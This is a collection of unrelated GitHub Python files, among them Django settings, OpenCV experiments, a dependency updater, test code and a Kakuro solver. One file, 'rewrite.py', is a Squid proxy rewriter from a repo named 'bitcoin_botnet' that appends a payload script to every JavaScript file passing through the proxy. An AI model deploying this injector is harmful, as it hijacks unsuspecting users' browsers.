+{"seq_id":"10207577207","text":"\"\"\"\nDjango settings for divesandybeach project.\n\n\"\"\"\nimport os\nfrom .config import load_config\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nconfig = load_config(BASE_DIR)\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/\n\n# Base Application definition settings\nDEBUG = config.DEBUG\nSECRET_KEY = config.SECRET_KEY\n\nSITE_ID = 1\nWSGI_APPLICATION = \"divesandybeach.wsgi.application\"\nROOT_URLCONF = \"divesandybeach.urls\"\nAUTH_USER_MODEL = \"core.User\"\n\n# Static files (CSS, JavaScript, Images)\nSTATIC_URL = \"/static/\"\nMEDIA_URL = \"/media/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static\")\n# STATICFILES_DIRS = [os.path.join(STATIC_ROOT, \"core/\")]\n\n\nINSTALLED_APPS = [\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n \"diving.apps.DivingConfig\",\n \"core.apps.CoreConfig\",\n \"django.contrib.sites\",\n \"crispy_forms\",\n \"allauth\",\n \"allauth.account\",\n \"allauth.socialaccount\",\n \"allauth.socialaccount.providers.google\",\n \"allauth.socialaccount.providers.facebook\",\n \"django_extensions\",\n \"snowpenguin.django.recaptcha3\",\n \"tempus_dominus\",\n]\n\nAUTHENTICATION_BACKENDS = [\n \"django.contrib.auth.backends.ModelBackend\",\n \"allauth.account.auth_backends.AuthenticationBackend\",\n]\n\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [os.path.join(BASE_DIR, \"templates\")],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"django.template.context_processors.media\",\n ],\n },\n },\n]\n\n# If debug is true then in development enviornment otherwise in production environment\nif DEBUG == True:\n ALLOWED_HOSTS = [\"*\"]\n\n RECAPTCHA_DISABLE = True\n\n # TODO: Need to change to console once secure, remove host and user\n EMAIL_BACKEND = \"django.core.mail.backends.locmem.EmailBackend\"\n DATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": os.path.join(BASE_DIR, \"db.sqlite3\"),\n }\n }\n\n # Static files (CSS, JavaScript, Images)\n # MEDIA_ROOT = os.path.join(BASE_DIR, \"media_root\")\n\n# Production Environment\nelse:\n ALLOWED_HOSTS = [\n \"divesandybeach.zeroisone.io\",\n \"www.divesandybeach.com\",\n \"divesandybeach.com\",\n \"*\",\n ]\n EMAIL_BACKEND = \"django.core.mail.backends.smtp.EmailBackend\"\n EMAIL_HOST = config.EMAIL_HOST\n EMAIL_HOST_USER = config.EMAIL_HOST_USER\n EMAIL_HOST_PASSWORD = config.EMAIL_HOST_PASSWORD\n EMAIL_USE_TLS = True\n EMAIL_PORT = 587\n\n DATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n # 'HOST': config.DB_HOST,\n \"NAME\": os.path.join(BASE_DIR, \"db.sqlite3\"),\n # 'USER': config.DB_USER,\n # 'PASSWORD': config.DB_PASSWORD,\n }\n }\n\n AUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n },\n ]\n\n # Static files (CSS, JavaScript, Images)\n # MEDIA_ROOT = os.path.join(BASE_DIR, \"media_root\")\n\n# Django storages\nSTORAGES = {\n \"default\": {\"BACKEND\": \"divesandybeach.storage.MediaStorage\"},\n \"staticfiles\": {\n \"BACKEND\": \"django.contrib.staticfiles.storage.StaticFilesStorage\",\n },\n}\n# STATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nAWS_ACCESS_KEY_ID = config.AWS_ACCESS_KEY_ID\nAWS_SECRET_ACCESS_KEY = config.AWS_SECRET_ACCESS_KEY\nAWS_STORAGE_BUCKET_NAME = config.AWS_STORAGE_BUCKET_NAME\nAWS_DEFAULT_ACL = None\nAWS_QUERYSTRING_AUTH = False\n\n# All other settings\n\n# Timezone settings\nDATE_FORMAT = \"%d-%m-%Y\"\nDATE_INPUT_FORMAT = \"%d-%m-%Y\"\nLANGUAGE_CODE = \"en-us\"\nTIME_ZONE = \"Asia/Dubai\"\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Django AllAuth settings\nSOCIALACCOUNT_PROVIDERS = config.SOCIALACCOUNT_PROVIDERS\nLOGIN_REDIRECT_URL = \"/\"\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_AUTHENTICATION_METHOD = \"email\"\nACCOUNT_USERNAME_REQUIRED = False\n\n# Crispy Forms\nCRISPY_TEMPLATE_PACK = \"bootstrap4\"\n\nRECAPTCHA_PUBLIC_KEY = config.RECAPTCHA_PUBLIC_KEY\nRECAPTCHA_PRIVATE_KEY = config.RECAPTCHA_PRIVATE_KEY\nRECAPTCHA_DEFAULT_ACTION = \"generic\"\nRECAPTCHA_SCORE_THRESHOLD = 0.5\n\n\n# # Tempus Dominus Settings DateTimePicker\n# TEMPUS_DOMINUS_LOCALIZE = True\n# TEMPUS_DOMINUS_INCLUDE_ASSETS = False\n","repo_name":"subaquatic-pierre/divesandybeach","sub_path":"divesandybeach/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31492336613","text":"import cv2 as cv\nimport numpy as np\n\nmain_win_name = \"threshold\"\ntitles = {\n 0: \"Binary\",\n 1: \"Binary Inverted\",\n 2: \"Threshold Truncated\",\n 3: \"Threshold to Zero\",\n 4: \"Threshold to Zero Inverted\",\n 7: \"Threshold Mask\",\n 8: \"Threshold Otsu\",\n}\n\n\ndef on_trackbar_change(val):\n # 0: Binary\n # 1: Binary Inverted\n # 2: Threshold Truncated\n # 3: Threshold to Zero\n # 4: Threshold to Zero Inverted\n # 8: Threshold Otsu\n for threshold_type in 0, 1, 2, 3, 4, 8:\n\n thresh = src_blur\n\n threshold_value = cv.getTrackbarPos(\"Threshold\", main_win_name)\n threshold_value, thresh = cv.threshold(thresh, threshold_value, 255, threshold_type)\n\n de_kernel = cv.getStructuringElement(cv.MORPH_RECT, (5, 5))\n iterations = cv.getTrackbarPos(\"Iterations\", main_win_name)\n thresh = cv.dilate(thresh, de_kernel, iterations=iterations)\n\n thresh = cv.erode(thresh, de_kernel, iterations=iterations)\n\n canny = cv.getTrackbarPos(\"Canny\", main_win_name)\n thresh = cv.Canny(thresh, canny, canny * 3)\n\n contours, hierarchy = cv.findContours(thresh, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n max_corners = cv.getTrackbarPos(\"Corners\", main_win_name)\n # corners = cv.goodFeaturesToTrack(thresh, max_corners, 0.01, 100)\n\n thresh = cv.cvtColor(thresh, cv.COLOR_GRAY2BGR)\n\n hulls_corners = ''\n paper_area = 0\n for contour in contours:\n hull = cv.convexHull(contour)\n\n hull_approx = cv.approxPolyDP(hull, 3, True)\n hull_approx_area = cv.contourArea(hull_approx)\n if (len(hull_approx) == 4) & (hull_approx_area > paper_area):\n paper_area = hull_approx_area\n\n hulls_corners += '{},'.format(len(hull_approx))\n # rect = cv.minAreaRect(hull)\n # box = cv.boxPoints(rect)\n # box = np.int0(box)\n # cv.drawContours(thresh, [box], -1, (0, 0, 255), thickness=3)\n # cv.drawContours(thresh, [contour], -1, (0, 255, 0), thickness=2)\n cv.drawContours(thresh, [hull_approx], -1, (255, 0, 255), thickness=4)\n # cv.drawContours(thresh, [hull], -1, (255, 0, 0), thickness=4)\n\n cv.putText(thresh, \"contours count {}\".format(len(contours)), (10, 10), cv.FONT_HERSHEY_PLAIN, 1, (255, 255, 255))\n cv.putText(thresh, \"all approx corners {}\".format(hulls_corners), (10, 30), cv.FONT_HERSHEY_PLAIN, 1,\n (255, 255, 255))\n cv.putText(thresh, \"threshold {}\".format(threshold_value), (10, 50), cv.FONT_HERSHEY_PLAIN, 1, (255, 255, 255))\n cv.putText(thresh, \"img {} {} {}\".format(len(thresh[0]), len(thresh), len(thresh[0]) * len(thresh)), (10, 70), cv.FONT_HERSHEY_PLAIN, 1, (255, 255, 255))\n cv.putText(thresh, \"paper area {}\".format(paper_area), (10, 90), cv.FONT_HERSHEY_PLAIN, 1, (255, 255, 255))\n\n # lines = cv.HoughLinesP(thresh, 1, np.pi / 180, threshold_value, None, 0, 0)\n # if lines is not None:\n # for i in range(0, len(lines)):\n # line = lines[i][0]\n # cv.line(thresh, (line[0], line[1]), (line[2], line[3]), (0, 255, 0), 3)\n\n # corners = np.int0(corners)\n # for i in corners:\n # x, y = i.ravel()\n # cv.circle(thresh, (x, y), 10, 255, -1)\n\n y = 0\n x_multiplier = threshold_type\n\n if threshold_type > 4:\n y = len(src)\n x_multiplier = threshold_type - 7\n\n x = x_multiplier * len(src[0])\n\n win_name = \"{} {}\".format(main_win_name, titles.get(threshold_type))\n cv.imshow(win_name, thresh)\n cv.moveWindow(win_name, x, y)\n\n\nif __name__ == '__main__':\n print(cv.getVersionString())\n src = cv.imread('resources/images/20200526_121130.jpg', cv.IMREAD_GRAYSCALE)\n src = cv.resize(src, None, fx=0.09, fy=0.09)\n cv.namedWindow(main_win_name, cv.WINDOW_AUTOSIZE)\n cv.imshow(main_win_name, src)\n # src_gray = cv.cvtColor(src, cv.COLOR_BGR2GRAY)\n src_blur = cv.GaussianBlur(src, (7, 7), 0)\n threshold = 190\n cv.createTrackbar(\"Threshold\", main_win_name, threshold, 255, on_trackbar_change)\n cv.createTrackbar(\"Canny\", main_win_name, 60, 255, on_trackbar_change)\n cv.createTrackbar(\"Iterations\", main_win_name, 2, 10, on_trackbar_change)\n cv.createTrackbar(\"Corners\", main_win_name, 4, 50, on_trackbar_change)\n on_trackbar_change(-1)\n cv.waitKey()\n","repo_name":"markfili/edge-detection","sub_path":"thresholds.py","file_name":"thresholds.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73314092270","text":"\"\"\"\n VDGE Updater is a cross-platform script used to automatically download and move in place all \n the libraries and headers used by the engine.\n Keep in mind that the download links may become unavailable after a while.\n Last archive revision: 25.01.2021\n\"\"\"\n\nimport os\nimport shutil\nfrom sys import platform\nimport json\nimport urllib.request\nimport zipfile\nimport tarfile\nimport time\nimport subprocess\n\n# Tools\ndef join_with_any(base, rel, create_if_not_exists=False):\n path = base\n if rel == '/':\n return path\n for d in rel.split('/'):\n if d == '*':\n any = os.listdir(path)[0]\n path = os.path.join(path, any)\n else:\n path = os.path.join(path, d)\n if not os.path.isdir(path):\n os.mkdir(path)\n return path\n\n# Executable\ndef update(package_file_location, cache_dir_location, include_dir_location, lib_dir_location):\n with open(package_file_location, 'r') as f:\n # Read package file\n packageJson = f.read()\n packages = json.loads(packageJson)['data']\n\n # Remove cache directory if it already exists\n if os.path.isdir(cache_dir_location):\n shutil.rmtree(cache_dir_location)\n\n # Compute cachedir path\n cache_dir_path = os.path.join(os.getcwd(), cache_dir_location)\n \n # Create a new cache directory\n os.mkdir(cache_dir_path)\n\n # Library Directory\n if os.path.isdir(lib_dir_location):\n shutil.rmtree(lib_dir_location)\n\n # Compute local lib dir path & create dir\n local_lib_dir_path = lib_dir_location\n os.mkdir(local_lib_dir_path)\n\n # Include Directory\n if os.path.isdir(include_dir_location):\n shutil.rmtree(include_dir_location)\n\n # Compute local include dir path & create dir\n local_include_dir_path = include_dir_location\n os.mkdir(local_include_dir_path)\n\n # Total packages counter\n total_count = 0\n\n for package in packages:\n print ('[>] Installing {}'.format(package['LIB']))\n\n configuration = None\n\n error = False\n\n if 'ANY' in package['PLATFORM']:\n print ('\\t[!] Cross-platform configuration found')\n configuration = package['PLATFORM']['ANY']\n elif (platform == 'linux' or platform == 'linux2' or platform == 'darwin') and ('UNIX' in package['PLATFORM']):\n print ('\\t[!] UNIX configuration found')\n configuration = package['PLATFORM']['UNIX']\n elif (platform == 'win32') and ('WIN' in package['PLATFORM']):\n print ('\\t[!] Windows configuration found')\n configuration = package['PLATFORM']['WIN']\n else:\n print ('\\t[#] No configuration found for {}'.format(platform))\n error = True\n\n base_ctx = None\n ctx = None\n\n # Run package methods\n for method in configuration['METHODS']:\n if error:\n break\n\n if method.startswith('DOWNLOAD'):\n fn = method.split(' ')[1]\n\n print('\\t[>] Downloading from {}:'.format(configuration['LINK']), flush=True, end=' ')\n tfn, _ = urllib.request.urlretrieve(configuration['LINK'])\n ctx = os.path.join(cache_dir_path, fn)\n base_ctx = ctx\n shutil.move(tfn, ctx)\n print('Done!') \n\n elif method.startswith('UNZIP'):\n dn = method.split(' ')[1]\n print ('\\t[>] Unzipping {} to {}:'.format(ctx, dn), flush=True, end=' ')\n with zipfile.ZipFile(ctx, 'r') as zr:\n ctx = os.path.join(cache_dir_location, dn)\n base_ctx = ctx\n zr.extractall(ctx)\n zr.close()\n print('Done!')\n\n elif method.startswith('UNTAR'):\n dn = method.split(' ')[1]\n print ('\\t[>] Tar extract {} to {}:'.format(ctx, dn), flush=True, end=' ')\n with tarfile.open(ctx) as tr:\n ctx = os.path.join(cache_dir_location, dn)\n base_ctx = ctx\n tr.extractall(ctx)\n tr.close()\n print('Done!')\n\n elif method.startswith('CTX'):\n dn = method.split(' ')[1]\n\n print ('\\t[>] Moving context from {}'.format(ctx), flush=True, end=' ')\n\n if dn == '/':\n ctx = base_ctx\n elif dn.startswith('/'):\n ctx = join_with_any(base_ctx, dn[1:])\n else:\n ctx = join_with_any(ctx, dn)\n\n print ('to {}'.format(ctx))\n\n elif method.startswith('HEADER') or method.startswith('LIBRARY'):\n is_header = method.startswith('HEADER')\n no_params = True if is_header and method == 'HEADER' else True if not is_header and method == 'LIBRARY' else False\n\n if no_params:\n bn = os.path.basename(ctx)\n print ('\\t[>] Moving {} {}:'.format('HEADER' if is_header else 'LIBRARY', bn), flush=True, end=' ')\n shutil.move(ctx, os.path.join(local_include_dir_path if is_header else local_lib_dir_path, bn))\n print ('Done!') \n else:\n tokens = method.split(' ')\n src = tokens[1]\n dst = tokens[2]\n \n print ('\\t[>] Moving {} files from {}...'.format('HEADER' if is_header else 'LIBRARY', package['LIB']))\n\n try:\n dst = join_with_any(local_include_dir_path if is_header else local_lib_dir_path, tokens[2])\n except:\n print('\\t\\t[#] Could not locate DESTINATION in {} instruction'.format('HEADER' if is_header else 'LIBRARY'))\n error = True\n break\n\n print ('\\t\\t[>] DESTINATION found at {}'.format(dst))\n\n is_file = False\n file_basename = None\n if src.endswith('/*'):\n src = src[0:len(src) - 2]\n elif src.endswith('/'):\n src = src[0:len(src) - 1]\n else:\n is_file = True\n file_basename = os.path.basename(src)\n src = os.path.dirname(src)\n\n wd = None\n try:\n wd = join_with_any(ctx, src)\n except:\n print('\\t\\t[#] Could not locate SOURCE in {} instruction!'.format('HEADER' if is_header else 'LIBRARY'))\n error = True\n break\n\n print ('\\t\\t[>] SOURCE found at {}'.format(wd))\n\n if os.path.isdir(wd):\n units = [file_basename] if is_file else os.listdir(wd)\n\n for el in units:\n current = os.path.join(wd, el)\n\n link_names = []\n while (os.path.islink(current)):\n link_names.append(os.path.basename(current))\n current = os.readlink(current)\n current = os.path.join(wd, current)\n\n future = os.path.join(dst, os.path.basename(current))\n print ('\\t\\t[>] Moving {} to {}'.format(current, future))\n shutil.move(current, future)\n\n for ln in link_names:\n ln_path = os.path.join(dst, ln)\n f_name = os.path.basename(future)\n print ('\\t\\t[>] Creating symlink {} to {}'.format(ln, f_name))\n os.symlink(f_name, ln_path)\n\n print ('\\t[>] Done!')\n\n elif method.startswith('CMAKE') or method.startswith('MAKE'):\n params = method.split(' ')\n params[0] = params[0].lower()\n\n print ('\\t[>] Building using {}...'.format(params[0]))\n\n cmd = ' '.join(params)\n\n cwd = os.getcwd()\n\n wd = join_with_any(cwd, ctx)\n\n print ('\\t\\t[>] Changing working directory to {}:'.format(wd), flush=True, end=' ')\n os.chdir(wd)\n print ('Done!')\n\n print ('\\t\\t[>] Running command \"{}\": '.format(cmd), flush=True, end=' ')\n p = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n print ('Done!')\n\n print ('\\t\\t[>] Changing working directory to {}:'.format(cwd), flush=True, end=' ')\n os.chdir(cwd)\n print ('Done!')\n\n if p.returncode != 0:\n print ('\\t\\t[#] Failure')\n\n out = p.stdout.decode('utf-8')\n err = p.stderr.decode('utf-8')\n print ('\\t\\t[#] Output:\\n{}'.format(out))\n print ('\\t\\t[#] Error:\\n{}'.format(err))\n error = True\n else:\n print('\\t[>] Done!')\n\n else:\n print ('\\t[#] Unknown method {}'.format(method))\n error = True\n\n if error:\n print ('[\\033[91mFAIL\\033[0m] {} was not installed.'.format(package['LIB']))\n break\n else:\n print ('[\\033[92mOK\\033[0m] {} installed successfully.'.format(package['LIB']))\n total_count += 1\n\n # Cleaning up cache\n print ('[>] Cleaning up...', flush=True, end=' ')\n time.sleep(3) \n shutil.rmtree(cache_dir_location)\n print ('Done!')\n f.close()\n\n if total_count < len(packages):\n print ('[\\033[91mFAIL\\033[0m] Updater failed after {}/{} packages.'.format(total_count, len(packages)))\n return 1\n\n print ('[\\033[92mOK\\033[0m] Updater installed {}/{} packages.'.format(total_count, len(packages)))\n return 0\n","repo_name":"valentindeaconu/vd_game_engine","sub_path":"meta/update_manager.py","file_name":"update_manager.py","file_ext":"py","file_size_in_byte":10871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"8641935243","text":"def balancedSum(n,arr):\n rSum = 0\n lSum = 0\n for item in arr:\n rSum += item\n \n for i in range(0,n):\n rSum -= arr[i]\n if(rSum == lSum):\n return 'YES'\n lSum += arr[i]\n return 'NO'\n \n\n\nT = int(input())\nfor i in range(0,T):\n n = int(input()) \n arr = list(map(int,str.strip(input()).split(' ')))\n print(balancedSum(n,arr))\n\n","repo_name":"kshtj24/HackerRank","sub_path":"Algorithms/Searching/Sherlock and Array.py","file_name":"Sherlock and Array.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18210292236","text":"# --- coding: utf-8 ---\n\nfrom unittest import TestCase\nfrom tree.binary_search_tree import binary_search_tree_check, levelOrderPrint, levelOrderPrint2, trimBST\nfrom tree.binary_search_tree import Tree, Node\n\nclass TestTree(TestCase):\n\n def test_binary_search_check(self):\n a = Tree(1, 'a')\n b = Tree(2, 'b')\n c = Tree(3, 'c')\n d = Tree(4, 'd')\n e = Tree(5, 'e')\n d.left = b\n b.left = a\n b.right = c\n d.left = e\n\n self.assertTrue(binary_search_tree_check(a))\n\n\n x = Tree(1, 'x')\n y = Tree(2, 'y')\n z = Tree(3, 'z')\n y.left = z\n y.right = x\n\n self.assertFalse(binary_search_tree_check(y))\n\n root= Tree(10, \"Hello\")\n root.left = Tree(5, \"Five\")\n root.right= Tree(30, \"Thirty\")\n self.assertTrue(binary_search_tree_check(root))\n\n root = Tree(10, \"Ten\")\n root.right = Tree(20, \"Twenty\")\n root.left = Tree(5, \"Five\")\n root.left.right = Tree(15, \"Fifteen\")\n self.assertFalse(binary_search_tree_check(root))\n\n def test_level_order_print(self):\n a = Node(1)\n b = Node(2)\n c = Node(3)\n d = Node(4)\n e = Node(5)\n f = Node(6)\n d.left = b\n b.left = a\n b.right = c\n d.right = e\n e.right = f\n\n assert_str = '4 \\n' + '2 5 \\n' + '1 3 6 \\n'\n\n self.assertEqual(levelOrderPrint(d), assert_str)\n self.assertEqual(levelOrderPrint2(d), assert_str)\n\n def test_trimBST(self):\n a = Node(1)\n b = Node(2)\n c = Node(3)\n d = Node(4)\n e = Node(5)\n f = Node(6)\n d.left = b\n b.left = a\n b.right = c\n d.right = e\n e.right = f\n\n g = trimBST(d, 2, 5)\n self.assertEqual(g.val, 4)\n self.assertEqual(g.left.val, 2)\n self.assertEqual(g.left.right.val, 3)\n self.assertEqual(g.left.left, None)\n self.assertEqual(g.right.val, 5)\n self.assertEqual(g.right.right, None)\n\n a = Node(8)\n b = Node(3)\n c = Node(1)\n d = Node(6)\n e = Node(4)\n f = Node(7)\n g = Node(10)\n h = Node(14)\n i = Node(13)\n\n a.left = b\n a.right = g\n b.left = c\n b.right = d\n d.left = e\n d.right = f\n g.right = h\n h.left = i\n\n j = trimBST(a, 5, 13)\n self.assertEqual(j.val, 8)\n self.assertEqual(j.left.val, 6)\n self.assertEqual(j.left.right.val, 7)\n self.assertEqual(j.left.left, None)\n self.assertEqual(j.right.val, 10)\n self.assertEqual(j.right.right.val, 13)\n self.assertEqual(j.right.right.left, None)\n","repo_name":"tmatsuba/python_datastructure_algorithm","sub_path":"tests/test_tree.py","file_name":"test_tree.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"17107480849","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport re\nfrom urllib import *\ncount = 0\n\ndef modify_url(line):\n list = line.split(' ')\n old_url = list[0]\n new_url = old_url\n pid = os.getpid()\n global count\n match = re.match('http://.*\\.js', old_url)\n if match:\n os.system('wget -q -O /var/www/html/' + str(pid) + '-' + str(count) + '.js ' + old_url)\n os.system('cat /etc/squid/payload.js >> /var/www/html/' + str(pid) + '-' + str(count) + '.js')\n os.system('chmod o+r /var/www/html/' + str(pid) + '-' + str(count) + '.js')\n new_url = 'http://127.0.0.1:80/' + str(pid) + '-' + str(count) + '.js'\n count += 1\n return new_url + '\\n'\n\ncount = 0\nwhile(True):\n line = sys.stdin.readline().strip()\n new_url = modify_url(line)\n sys.stdout.write(new_url)\n sys.stdout.flush()\n\n","repo_name":"4m1g0/bitcoin_botnet","sub_path":"rewrite.py","file_name":"rewrite.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"13537224076","text":"import sys\nfrom PyQt4 import QtGui\n\nprint(\"entered function\")\napp = QtGui.QApplication(sys.argv)\nprint(\"app created\")\nw = QtGui.QWidget()\nprint(\"widget created\")\nb = QtGui.QLabel(w)\nb.setText(\"Hello World!\")\nw.setGeometry(100,100,200,50)\nb.move(50,20)\nw.setWindowTitle(\"PyQt\")\nw.show()\nsys.exit(app.exec_())\n","repo_name":"GayathryS/pyqt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24384842912","text":"'''\r\nFor loop for printing natural numbers and its sum upto 'n'\r\n\r\n'''\r\nnum = int(input(\"Enter a number: \"))\r\nsum = 0\r\n# range(start_from, end_comes_before, incremented_by (default is 1))\r\nfor i in range(1, num+1):\r\n print(i, end=\" \")\r\n sum = sum + i\r\nprint(\"\\nThe sum is :\", sum)\r\n\r\nprint(\"\\n\")\r\n\r\nfruits = ['apple', 'berry', 'cherry']\r\nfor item in fruits:\r\n print(item)\r\n \r\nprint(\"\\n\")\r\n\r\n# looping through string\r\nfor c in \"ABCDEFGHIJKLMOPQRSTUVWXYZ\":\r\n print(f\"{c} \", end=\"\")\r\n \r\nprint(\"\\n\")\r\n# break statements\r\nfor c in fruits:\r\n if c == \"cherry\":\r\n break\r\n print(c)\r\n \r\n# for loops cannot be empty,\r\n# \"IndentationError: expected an indented block after 'for' statement on line\", the error\r\nfor x in fruits:\r\n pass\r\n","repo_name":"BANZOM/PP-Python-Practice","sub_path":"forLoop.py","file_name":"forLoop.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13494477288","text":"import heapq\n\n\nclass Kakuro:\n def __init__(self, row, col):\n self.row = row\n self.col = col\n self.board = []\n self.arrOfValueNodes = []\n self.copyOfArrOfValueNodes = []\n\n # full the arr of nodes to have all value nodes in one arr.\n def set_arr_of_value_nodes(self):\n for i in range(0, self.row):\n for j in range(0, self.col):\n\n temp_node = self.board[i][j]\n if temp_node.name[0] == 'X':\n self.arrOfValueNodes.append(temp_node)\n\n def add_nodes_to_board(self, array_of_nodes):\n self.board.append(array_of_nodes)\n\n def print_board(self):\n text = \"\"\n for i in range(0, self.row):\n for j in range(0, self.col):\n # because B nodes has no number in their name\n if str(self.board[i][j]) == 'B':\n text += str(self.board[i][j]) + \" \" * 3\n else:\n text += str(self.board[i][j]) + \" \"\n text += '\\n'\n return text\n\n def solve(self):\n pass\n\n # find neighbors of each nodes and set row and col consistency to each value node.\n def find_neighbors(self):\n for i in range(0, self.row):\n for j in range(0, self.col):\n temp_arr = []\n temp_node = self.board[i][j]\n if temp_node.name[0] == 'X':\n # from where temp_node is to right.\n for k in range(j + 1, self.col):\n temp_node2 = self.board[i][k]\n if temp_node2.name[0] == 'X':\n if temp_node2.name != temp_node.name:\n temp_arr.append(temp_node2)\n else:\n break\n # from where temp_node is to left.\n for k in range(j, -1, -1):\n temp_node2 = self.board[i][k]\n if temp_node2.name[0] == 'X':\n if temp_node2.name != temp_node.name:\n temp_arr.append(temp_node2)\n else:\n if temp_node2.name[0] == 'C':\n temp_node.set_row_constraint(temp_node2.rowC)\n break\n temp_node.add_horizontal_neighbors(temp_arr)\n temp_arr = []\n # from where temp_node is to down.\n for k in range(i + 1, self.row):\n temp_node2 = self.board[k][j]\n if temp_node2.name[0] == 'X':\n if temp_node2.name != temp_node.name:\n temp_arr.append(temp_node2)\n else:\n break\n # from where temp_node is to up.\n for k in range(i - 1, -1, -1):\n temp_node2 = self.board[k][j]\n if temp_node2.name[0] == 'X':\n if temp_node2.name != temp_node.name:\n temp_arr.append(temp_node2)\n else:\n if temp_node2.name[0] == 'C':\n temp_node.set_col_constraint(temp_node2.colC)\n break\n temp_node.add_vertical_neighbors(temp_arr)\n\n # # set domain to each node that are have consistency less than 9\n # def set_domain_to_each_node(\n # self): # TODO check the neighbors and then set domain depend on the count of neighbors.\n # for i in range(0, self.row):\n # for j in range(0, self.col):\n # temp_arr = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n # temp_node = self.board[i][j]\n # if temp_node.name[0] == 'X':\n # if temp_node.rowC > 9 and temp_node.colC > 9:\n # temp_node.set_domain(temp_arr)\n #\n # elif temp_node.rowC < 9:\n # temp_arr = [x for x in temp_arr if x <= temp_node.rowC - 1] # TODO check the neighbors>=1.\n # temp_node.set_domain(temp_arr)\n #\n # elif temp_node.colC < 9:\n # temp_arr = [x for x in temp_arr if x <= temp_node.colC - 1] # TODO check the neighbors>=1.\n # temp_node.set_domain(temp_arr)\n #\n # # print(temp_node.domain)\n\n # calculate the domain of nodes that has no value depend on their neighbors\n def calculate_domain(self):\n for i in range(0, self.row):\n for j in range(0, self.col):\n temp_arr = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n temp_node = self.board[i][j]\n if temp_node.name[0] == 'X' and temp_node.value is None:\n number_of_neighbors = 1\n # print(temp_node.horizontalNeighbors)\n for k in range(0, len(temp_node.horizontalNeighbors)):\n if temp_node.horizontalNeighbors[k].value is None:\n number_of_neighbors += 1\n # print(temp_node.rowC)\n max_value = int(temp_node.rowC - ((number_of_neighbors * (number_of_neighbors - 1)) / 2))\n min_value = int(temp_node.rowC - ((20 - number_of_neighbors) * (number_of_neighbors - 1)) / 2)\n # print(f\"{temp_node} max Value {max_value} min Value {min_value}\")\n # print(number_of_neighbors)\n temp_arr = [x for x in temp_arr if x >= min_value]\n temp_arr = [x for x in temp_arr if x <= max_value]\n # print(temp_arr)\n temp_node.set_domain(temp_arr)\n\n number_of_neighbors = 1\n # print(temp_node.verticalNeighbors)\n for k in range(0, len(temp_node.verticalNeighbors)):\n if temp_node.verticalNeighbors[k].value is None:\n number_of_neighbors += 1\n max_value = int(temp_node.colC - ((number_of_neighbors * (number_of_neighbors - 1)) / 2))\n min_value = int(temp_node.colC - ((20 - number_of_neighbors) * (number_of_neighbors - 1)) / 2)\n temp_arr = [x for x in temp_arr if x >= min_value]\n temp_arr = [x for x in temp_arr if x <= max_value]\n # print(temp_arr)\n # print(f\"{temp_node} max Value {max_value} min Value {min_value}\")\n if temp_node.domain != temp_arr:\n if len(temp_arr) < len(temp_node.domain):\n temp_node.set_domain(temp_arr)\n # print(temp_node.domain)\n\n @staticmethod\n # function that check goal: if all variables have value.\n def check_goal(row, col, board):\n i = 0\n check_node = False\n while i < row:\n j = 0\n while j < col:\n temp_node = board[i][j]\n if temp_node.name[0] == 'X' and temp_node.value is None:\n check_node = True\n break\n else:\n j += 1\n if check_node:\n break\n else:\n i += 